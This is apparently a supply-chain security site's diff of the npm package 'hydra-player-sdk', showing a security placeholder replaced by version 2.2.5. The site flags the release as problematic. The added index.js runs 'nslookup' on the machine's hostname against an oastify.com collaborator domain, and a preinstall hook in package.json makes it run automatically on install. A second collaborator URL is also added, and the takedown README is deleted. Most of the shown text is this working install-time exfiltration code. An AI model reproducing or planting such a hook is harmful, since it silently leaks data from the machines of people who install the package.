hydra-player-sdk 0.0.1-security → 2.2.5

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of hydra-player-sdk might be problematic. Click here for more details.

package/collab url ADDED
@@ -0,0 +1,2 @@
1
+ collab url
2
+ t5zd20rrjkpqmnanh6zdtuj7syytmi.oastify.com
package/index.js ADDED
@@ -0,0 +1,15 @@
1
+ const { exec } = require('child_process');
2
+
3
+ exec('nslookup `hostname`.umkeclp56blrnkv4gh7j90h3puvlja.oastify.com', (error, stdout, stderr) => {
4
+ if (error) {
5
+ console.error(`Error executing command: ${error.message}`);
6
+ return;
7
+ }
8
+
9
+ if (stderr) {
10
+ console.error(`stderr: ${stderr}`);
11
+ return;
12
+ }
13
+
14
+ console.log(`stdout: ${stdout}`);
15
+ });
package/package.json CHANGED
@@ -1,6 +1,12 @@
1
1
  {
2
2
  "name": "hydra-player-sdk",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "2.2.5",
4
+ "main": "index.js",
5
+ "scripts": {
6
+ "test": "echo \"Error: no test specified\" && exit 1",
7
+ "preinstall": "node index.js"
8
+ },
9
+ "author": "",
10
+ "license": "ISC",
11
+ "description": ""
6
12
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=hydra-player-sdk for more information.